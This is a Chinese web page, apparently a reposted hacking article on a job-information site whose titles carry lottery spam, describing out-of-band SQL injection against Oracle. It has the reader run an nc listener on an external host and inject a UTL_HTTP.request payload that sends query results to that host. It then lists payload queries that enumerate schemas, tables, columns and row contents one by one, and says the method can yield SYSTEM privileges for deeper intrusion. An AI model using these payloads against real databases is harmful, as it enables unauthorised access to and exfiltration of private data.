足球游戏_中国足彩网¥体育资讯$

简要咨询 咨询QQ 网站导航 网站搜索 手机站点 联系我们
搜公告
  • 搜公告
  • 搜职位
公众号
事业单位
首 页
足球游戏
事业单位
特岗教师
三支一扶
银行招聘
中国足彩网
选调遴选
学历升学
公 众 号
全站导航
当前位置:首页 > 范文|应用文 > IT技术专栏 > 数据库
Oracle注射技术——Oracle+nc注射
来源:易贤网 阅读:996 次 日期:2015-10-15 16:45:29
温馨提示:易贤网小编为您整理了“Oracle注射技术——Oracle+nc注射”,方便广大网友查阅!

首先外网nc监听对应的端口

and UTL_HTTP.request('外网ip:port/'||(sql语句))=1--

爆库:

select owner from all_tables where rownum=1

select owner from all_tables where owner<>'第一个库名'

and rownum=1

select owner from all_tables where owner<>'第一个库名'

and owner<>'第二个'and rownum=1

select owner from all_tables where owner<>'第一个库名'

and owner<>'第一个库名' and rownum=1

以此论推

爆表:

select TABLE_NAME from all_tables where owner='库名'

and rownum=1

select TABLE_NAME from all_tables where owner='库名'

and rownum=1 and TABLE_NAME<>'表名1'

select TABLE_NAME from all_tables where owner='库名'and rownum=1

and TABLE_NAME<>'表名1' and TABLE_NAME<>'表名2'

以此论推

爆列:

select COLUMN_NAME from user_tab_columns where table_name='表名'

and rownum=1

select COLUMN_NAME from user_tab_columns where table_name='表名'

and rownum=1 and COLUMN_NAME<>'第一个爆出的列名'

select COLUMN_NAME from user_tab_columns where table_name='表名'

and rownum=1 and COLUMN_NAME<>'第一个爆出的列名' and COLUMN_NAME<>'第二个爆出的列名'

爆内容:

第一个内容:select 列名 from 表名 where rownum=1

第二个内容:select 列名 from 表名 where rownum=1 and 列名<>'第一个值'

第三个内容:select 列名 from 表名 where rownum=1 and 列名<>'第一个值' and 列名<>'第二个值'

以此论推

现在大家转过头来看下“万网的尴尬-万网ORACLE注入漏洞曝光http://bbs.exploits.com.cn/read.php?tid-144.html

是不是很明了了...o(∩_∩)o...哈哈

注:

1:在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中,以供给大家更直观、简洁、有效的参考资料

2:针对unix和linux操作系统方面对于Oracle也会作出分析,相信Oracle注射将会成为转入高级Hack入侵的桥梁

中国足彩网信息请查看IT技术专栏

中国足彩网信息请查看数据库
【点此处就本文及相关问题在本站进行非正式的简要咨询(便捷快速)】 【点此处查询各地各类考试咨询QQ号码及交流群】
上一篇:研究人员发现攻击Oracle数据库的新方法
下一篇:数据库安全管理的三个经验分享
易贤网手机网站地址:Oracle注射技术——Oracle+nc注射
由于各方面情况的不断调整与变化,易贤网提供的所有考试信息和咨询回复仅供参考,敬请考生以权威部门公布的正式信息和咨询为准!
相关阅读数据库
解决MongoDB 排序超过内存限制的问题08月04日
Windows下MongoDb简单配置教程08月04日
Mongodb实战之全文搜索功能08月04日
MongoDB 管道的介绍及操作符实例08月04日
在Linux服务器中配置mongodb环境的步骤08月04日
mac下安装和配置mongodb的步骤详解08月04日
Mongo复制集同步验证的实例详解08月04日
MongoDB 中Limit与Skip的使用方法详解08月04日
Oracle删除数据报ORA 02292错误的巧妙解决方法08月04日
Oracle查询最近几天每小时归档日志产生数量的脚本写法08月04日
Oracle查看表结构命令详解08月04日
Oracle 11g如何清理数据库的历史日志详解08月04日
Oracle表中重复数据去重的方法实例详解08月04日
WIN7下ORACLE10g服务端和客户端的安装图文教程08月04日
Oracle查看表结构的几种方法示例代码08月04日
pl/sql连接远程oracle服务器的配置教程08月04日
IOS 数据库升级数据迁移的实例详解08月04日
mysql exists与not exists实例详解08月04日
关于Windows10下解决MySQL5.5数据库命令行中文乱码问题08月04日
细说MySQL死锁与日志二三事08月04日
易贤网移动网站
最新信息
2024年昆明市财政局所属事业单位选调工作人员资格复审公告
2024年昆明市农业农村局直属事业单位选调工作人员资格复审公告
2023年昆明市民政局事业单位选调 工作人员拟调人员公示(四)
2024年西双版纳州招聘大学生乡村医生笔试成绩及资格复审公告
2024年楚雄州永仁县县疾病预防控制中心选调工作人员公告
2024年楚雄州永仁县会计专业技术中级资格考试成绩合格人员资格审核公告
2024年临沧市永德县会计专业技术中级资格考试成绩合格人员资格审核公告
2024年临沧市永德县亚练乡人民政府招聘1名公益性岗位人员公告
2024年大理州漾濞县瓦厂乡人民政府公益性岗位招聘公告
2024年大理州漾濞县残疾人联合会招聘公益性岗位公告
公考类
云南公务员 贵州公务员 四川公务员 广西公务员 各省公务员 国家公务员 选调遴选
招聘类
事业单位 中国足彩网 特岗教师 三支一扶 志 愿 者 银行招聘 国企招聘
各类考试
学历升学 会计考试 职业资格 外语考试 医学考试 工程考试 教师资格
关于我们 | 联系我们 | 人才招聘 | 网站声明 | 网站帮助 | 非正式的简要咨询 | 简要咨询须知 | 加入群交流 | 手机站点 | 投诉建议
工业和信息化部备案号:滇ICP备2023014141号-1 足球游戏_中国足彩网¥体育资讯$ 滇公网安备53010202001879号 人力资源服务许可证:(云)人服证字(2023)第0102001523号
云南网警备案专用图标
联系电话:0871-65317125(9:00—18:00) 获取招聘考试信息及咨询关注公众号:hfpxwx
咨询QQ:526150442(9:00—18:00)版权所有:易贤网
云南网警报警专用图标